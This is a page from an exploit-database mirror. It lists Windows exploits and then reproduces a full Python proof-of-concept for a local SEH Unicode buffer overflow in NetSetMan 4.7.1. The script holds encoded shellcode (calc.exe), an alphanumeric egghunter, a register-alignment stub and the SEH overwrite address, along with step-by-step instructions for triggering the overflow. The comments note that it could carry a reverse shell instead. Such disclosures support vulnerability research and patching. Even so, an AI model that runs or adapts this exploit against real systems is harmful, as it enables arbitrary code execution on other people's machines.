Menu

Improved exploit search engine. Try python and hit enter

"NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)"

Author

"Devin Casadey"

Platform

windows

Release date

2019-03-11

Release Date Title Type Platform Author
2019-03-21 "DVD X Player 5.5.3 - '.plf' Buffer Overflow" local windows "Paolo Perego"
2019-03-21 "Canarytokens 2019-03-01 - Detection Bypass" dos windows "Gionathan Reale"
2019-03-20 "NetShareWatcher 1.5.8.0 - Local SEH Buffer Overflow" local windows "Peyman Forouzan"
2019-03-19 "Advanced Host Monitor 11.92 beta - Local Buffer Overflow" local windows "Peyman Forouzan"
2019-03-19 "Microsoft Edge - Flash click2play Bypass with CObjectElement::FinalCreateObject" dos windows "Google Security Research"
2019-03-19 "Microsoft VBScript - VbsErase Memory Corruption" dos windows "Google Security Research"
2019-03-19 "Microsoft Internet Explorer 11 - VBScript Execution Policy Bypass in MSHTML" dos windows "Google Security Research"
2019-03-18 "WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 - Denial of Service" dos windows Achilles
2019-03-18 "WinMPG Video Convert 9.3.5 - Denial of Service" dos windows Achilles
2019-03-15 "Mail Carrier 2.5.1 - 'MAIL FROM' Buffer Overflow" remote windows "Joseph McDonagh"
2019-02-22 "WinRAR 5.61 - Path Traversal" local windows WyAtu
2019-03-14 "FTPGetter Standard 5.97.0.177 - Remote Code Execution" remote windows w4fz5uck5
2019-03-13 "Apache Tika-server < 1.18 - Command Injection" remote windows "Rhino Security Labs"
2019-03-13 "Microsoft Windows MSHTML Engine - _Edit_ Remote Code Execution" local windows "Eduardo Braun Prado"
2019-03-13 "Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal" dos windows "Kevin Randall"
2019-03-13 "Core FTP Server FTP / SFTP Server v2 Build 674 - 'MDTM' Directory Traversal" dos windows "Kevin Randall"
2019-03-13 "Microsoft Windows - .reg File / Dialog Box Message Spoofing" dos windows hyp3rlinx
2019-03-11 "PRTG Network Monitor 18.2.38 - Authenticated Remote Code Execution" webapps windows M4LV0
2019-03-11 "NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)" local windows "Devin Casadey"
2019-03-12 "Core FTP 2.0 build 653 - 'PBSZ' Denial of Service (PoC)" dos windows Hodorsec
2019-03-08 "McAfee ePO 5.9.1 - Registered Executable Local Access Bypass" webapps windows leonjza
2019-03-07 "Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)" local windows Hodorsec
2019-03-04 "MarcomCentral FusionPro VDP Creator < 10.0 - Directory Traversal" webapps windows 0v3rride
2019-03-04 "Splunk Enterprise 7.2.4 - Custom App RCE (Persistent Backdoor - Custom Binary Payload)" webapps windows "Matteo Malvica"
2019-03-04 "STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (2)" local windows "Ivan Ivanovic"
2019-03-04 "Microsoft Edge Chakra 1.11.4 - Read Permission via Type Confusion" dos windows "Fahad Aid Alharbi"
2019-03-01 "Cisco WebEx Meetings < 33.6.6 / < 33.9.1 - Privilege Escalation" local windows SecureAuth
2019-02-28 "TransMac 12.3 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-02-25 "Xlight FTP Server 3.9.1 - Buffer Overflow (PoC)" dos windows "Logan Whitmire"
2019-02-22 "Nuuo Central Management - Authenticated SQL Server SQL Injection (Metasploit)" remote windows Metasploit
Release Date Title Type Platform Author
2019-03-11 "NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)" local windows "Devin Casadey"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46530/?format=json')
For full documentation follow the link above

Ads

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
#Exploit Title: NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)
#Exploit Author: Devin Casadey
#Discovery Date: 2019-03-11
#Vendor Homepage: https://www.netsetman.com/
#Software Link: https://www.netsetman.com/netsetman.exe
#Tested Version: 4.7.1
#Tested on: Windows XP SP3

#-------------------------------------------------------------------------------

#Steps to replicate:
#1. Run the Python code below which outputs two payload .txt files.
#2. Open NetSetMan
#3. Enable "Workgroup" for both the "[Double Click!]" tab and "SET1" tab
#4. Paste contents of "payload2.txt" into the "Workgroup" field in the "SET1" tab.
#5. Paste contents of "payload1.txt" into the "Workgroup" field in the "[Double Click!]" tab.
#6. Click "Activate"
#7. ...
#8. Profit

#This is a unicode SEH overflow, but the buffer is too small for a unicode encoded reverse shell payload.
#Therefore, an egghunter is implemented to locate an alphanumeric encoded payload stored in memory.

#-------------------------------------------------------------------------------

# msfvenom -p windows/exec cmd=calc.exe -b "\x00" -e x86/alpha_mixed -f python
#-v shellcode EXITFUNC=seh BufferRegister=EDI
#Payload size: 440 bytes
shellcode =  ""
shellcode = "w00tw00t"
shellcode += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
shellcode += "\x42\x75\x4a\x49\x69\x6c\x59\x78\x6d\x52\x57\x70"
shellcode += "\x43\x30\x75\x50\x53\x50\x6c\x49\x49\x75\x36\x51"
shellcode += "\x39\x50\x71\x74\x6c\x4b\x56\x30\x46\x50\x4e\x6b"
shellcode += "\x71\x42\x46\x6c\x4e\x6b\x76\x32\x57\x64\x6e\x6b"
shellcode += "\x44\x32\x34\x68\x76\x6f\x6d\x67\x43\x7a\x71\x36"
shellcode += "\x44\x71\x6b\x4f\x6e\x4c\x57\x4c\x65\x31\x33\x4c"
shellcode += "\x47\x72\x36\x4c\x75\x70\x6f\x31\x5a\x6f\x34\x4d"
shellcode += "\x67\x71\x39\x57\x48\x62\x4a\x52\x43\x62\x46\x37"
shellcode += "\x6c\x4b\x32\x72\x32\x30\x6c\x4b\x71\x5a\x45\x6c"
shellcode += "\x6e\x6b\x70\x4c\x32\x31\x73\x48\x4a\x43\x63\x78"
shellcode += "\x56\x61\x6e\x31\x56\x31\x6e\x6b\x30\x59\x57\x50"
shellcode += "\x35\x51\x79\x43\x6c\x4b\x72\x69\x55\x48\x4d\x33"
shellcode += "\x46\x5a\x52\x69\x4e\x6b\x77\x44\x6e\x6b\x76\x61"
shellcode += "\x68\x56\x75\x61\x6b\x4f\x6c\x6c\x59\x51\x78\x4f"
shellcode += "\x66\x6d\x77\x71\x4b\x77\x30\x38\x6d\x30\x51\x65"
shellcode += "\x58\x76\x53\x33\x43\x4d\x69\x68\x67\x4b\x73\x4d"
shellcode += "\x67\x54\x50\x75\x4b\x54\x62\x78\x4c\x4b\x73\x68"
shellcode += "\x76\x44\x57\x71\x68\x53\x71\x76\x6e\x6b\x56\x6c"
shellcode += "\x72\x6b\x6e\x6b\x43\x68\x47\x6c\x66\x61\x6e\x33"
shellcode += "\x6e\x6b\x76\x64\x6c\x4b\x36\x61\x6a\x70\x6d\x59"
shellcode += "\x31\x54\x76\x44\x66\x44\x63\x6b\x61\x4b\x65\x31"
shellcode += "\x51\x49\x50\x5a\x73\x61\x59\x6f\x79\x70\x51\x4f"
shellcode += "\x71\x4f\x43\x6a\x4e\x6b\x55\x42\x5a\x4b\x4c\x4d"
shellcode += "\x73\x6d\x61\x7a\x37\x71\x6c\x4d\x6c\x45\x58\x32"
shellcode += "\x55\x50\x45\x50\x43\x30\x36\x30\x52\x48\x64\x71"
shellcode += "\x6c\x4b\x32\x4f\x4e\x67\x59\x6f\x79\x45\x4f\x4b"
shellcode += "\x6b\x4e\x56\x6e\x75\x62\x48\x6a\x65\x38\x6f\x56"
shellcode += "\x4a\x35\x6d\x6d\x6f\x6d\x6b\x4f\x68\x55\x75\x6c"
shellcode += "\x53\x36\x43\x4c\x36\x6a\x4b\x30\x4b\x4b\x6d\x30"
shellcode += "\x34\x35\x77\x75\x4f\x4b\x62\x67\x64\x53\x30\x72"
shellcode += "\x72\x4f\x30\x6a\x53\x30\x43\x63\x4b\x4f\x68\x55"
shellcode += "\x42\x43\x30\x61\x70\x6c\x31\x73\x44\x6e\x30\x65"
shellcode += "\x32\x58\x51\x75\x55\x50\x41\x41"

egghunter =(
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIA"
"IAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30A"
"PB944JBC6SQGZKOLO0B0RQZOSR88MNNOLKUPZSDJO6XT7NPNP3DTKKJ6OD5JJ"
"6OBUK7KOYWLJA"
)

regPrep = (
    "\x63" #nop/align
    "\x55" #push ebp
    "\x62" #nop/align
    "\x58" #pop eax
    "\x62" #nop/align
    "\x05\x14\x11" #add eax, 0x11001400
    "\x62" #nop/align
    "\x2d\x13\x11" #sub eax, 0x11001300
    "\x62" #nop/align
    "\x50" #push eax
    "\x62" #nop/align
    "\xc3") #ret

buffer = ""
buffer += "\x61" * 75 #junk
buffer += "\x62" * 1  #nop

#0x00590058 : pop ebx # pop ebp # ret 0x08 | startnull,unicode,asciiprint,ascii {PAGE_EXECUTE_READ} [netsetman.exe]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.7.1.0 (C:\Program Files\NetSetMan\netsetman.exe)
buffer += "\x58\x59" #SEH overwrite to pop-pop-ret instruction
buffer += regPrep
buffer += "\x62" * 108 #offset to egghunter
buffer += egghunter

#Write initial SEH overflow payload + egghunter with venetian shellcode
f = open('payload1.txt','w')
f.write(buffer)
f.close()

#Egg + alphanumeric encoded shellcode payload
g = open('payload2.txt', 'w')
g.write(shellcode)
g.close()